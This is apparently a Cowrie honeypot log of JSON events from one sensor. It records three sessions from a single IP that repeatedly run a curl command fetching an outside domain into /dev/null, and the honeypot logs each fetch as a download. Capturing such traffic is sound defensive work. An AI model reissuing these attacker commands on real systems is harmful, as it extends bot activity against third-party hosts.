{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.159952Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.191066Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.192071Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.192511Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.195488Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.196099Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.197706Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.198251Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.203809Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.206482Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.253849Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.254526Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.256039Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.256739Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.258514Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.259060Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.262557Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.265697Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.267880Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.298748Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.299445Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.301576Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.302180Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.303513Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.304054Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.308281Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.312679Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.336949Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.338729Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.340744Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.342694Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.343238Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.345057Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.345563Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.347619Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.348258Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.379097Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.380668Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.381328Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.383674Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.384416Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.386071Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.387003Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.387483Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.419110Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.420955Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.421830Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.422810Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.425508Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.426118Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.428139Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.428888Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.433333Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.461841Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.463638Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.465233Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.467401Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.469099Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.469654Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.474172Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.475796Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.476428Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.477779Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.478325Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.509367Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.510301Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.511046Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.554521Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.555601Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.557222Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.558576Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.561923Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.564359Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.592220Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.594490Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.595823Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.596314Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.600627Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.601319Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.603238Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
